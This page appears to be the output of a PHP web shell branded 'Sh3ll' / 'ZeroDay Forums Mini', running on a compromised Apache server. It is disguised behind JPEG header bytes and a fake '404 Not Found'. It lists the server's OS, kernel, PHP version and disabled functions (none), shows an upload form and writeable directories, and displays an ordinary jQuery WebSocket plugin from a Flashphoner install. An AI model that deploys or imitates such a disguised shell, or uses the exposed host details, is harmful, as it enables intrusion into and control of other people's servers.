����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/local/FlashphonerWebCallServer/client/dependencies/jquery/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/FlashphonerWebCallServer/client/dependencies/jquery/jquery.websocket.js
(function ($) {
    $.extend({
        websocketSettings: {
            open: function () {
            },
            close: function () {
            },
            error: function () {
            },
            message: function () {
            },
            options: {},
            events: {},
            context: this
        },
        websocket: function (url, s) {
            var ws = WebSocket ? new WebSocket(url) : {
                send: function (m) {
                    return false
                },
                close: function () {
                }
            };
            ws.binaryType = 'arraybuffer';
            $.extend($.websocketSettings, s);
            $(ws).bind('open', $.websocketSettings.open)
                .bind('close', $.websocketSettings.close)
                .bind('error', $.websocketSettings.error)
                .bind('message', $.websocketSettings.message)
                .bind('message', function (e) {
                    var h;
                    if (e.originalEvent.data instanceof ArrayBuffer) {
                        h = $.websocketSettings.events["binaryData"];
                        if (h) h.apply($.websocketSettings.context, [e.originalEvent]);
                    } else {
                        var m = $.evalJSON(e.originalEvent.data);
                        h = $.websocketSettings.events[m.message];
                        if (h) h.apply($.websocketSettings.context, m.data);
                    }
                });

            ws._send = ws.send;
            ws.send = function (message, data) {
                if (ws.readyState == 1) {
                    var m = {message: message};
                    m = $.extend(true, m, $.extend(true, {}, $.websocketSettings.options, m));
                    if (!(data == null || typeof data === "undefined")) m['data'] = [data];
                    return this._send($.toJSON(m));
                }
                {
                    return false;
                }
            };
            $(window).unload(function () {
                ws.close();
                ws = null
            });
            return ws;
        }
    });
})(jQuery);

ZeroDay Forums Mini